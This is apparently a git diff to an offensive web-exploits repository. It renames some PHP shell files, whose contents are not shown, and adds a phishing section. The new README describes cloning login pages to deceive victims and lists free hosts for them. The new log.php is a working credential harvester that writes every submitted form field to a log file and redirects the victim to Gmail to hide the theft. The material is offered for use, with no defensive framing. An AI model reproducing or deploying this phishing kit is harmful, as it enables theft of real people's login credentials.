diff --git a/Web_Exploits/PHP_shells/exploit_13.php b/Web_Exploits/PHP_shellcodes/exploit_13.php
similarity index 100%
rename from Web_Exploits/PHP_shells/exploit_13.php
rename to Web_Exploits/PHP_shellcodes/exploit_13.php
diff --git a/Web_Exploits/PHP_shells/phpprimer_v0.1.pdf b/Web_Exploits/PHP_shellcodes/phpprimer_v0.1.pdf
similarity index 100%
rename from Web_Exploits/PHP_shells/phpprimer_v0.1.pdf
rename to Web_Exploits/PHP_shellcodes/phpprimer_v0.1.pdf
diff --git a/Web_Exploits/PHP_shells/xor.php b/Web_Exploits/PHP_shellcodes/xor.php
similarity index 100%
rename from Web_Exploits/PHP_shells/xor.php
rename to Web_Exploits/PHP_shellcodes/xor.php
diff --git a/Web_Exploits/Phishing/README.md b/Web_Exploits/Phishing/README.md
new file mode 100644
index 0000000..301ed17
--- /dev/null
+++ b/Web_Exploits/Phishing/README.md
@@ -0,0 +1,18 @@
+# Phishing
+
+* Way of deceiving your victim by making him/her login through one of your webpages which is the clone of the original.
+
+* Fake login/scamming pages which are often to hack identification information.
+
+## Tools
+
+### Free Hostings:
+
+- http://www.my3gb.com/
+- http://110mb.com/
+- http://www.freehostia.com/
+- http://www.awardspace.com/
+- http://prohosts.org/
+- http://www.000webhost.com/
+- http://www.atspace.com/
+- http://zymic.com/
diff --git a/Web_Exploits/Phishing/log.php b/Web_Exploits/Phishing/log.php
new file mode 100644
index 0000000..14bea32
--- /dev/null
+++ b/Web_Exploits/Phishing/log.php
@@ -0,0 +1,13 @@
+<?php
+header ('Location:http://www.gmail.com');
+$handle = fopen("log.txt", "a");
+foreach($_POST as $variable => $value) { 
+	fwrite($handle, $variable); 
+	fwrite($handle, "=");
+	fwrite($handle, $value); 
+	fwrite($handle, "\r\n"); }
+fwrite($handle,"\r\n");
+fclose($handle);
+exit;
+?>
+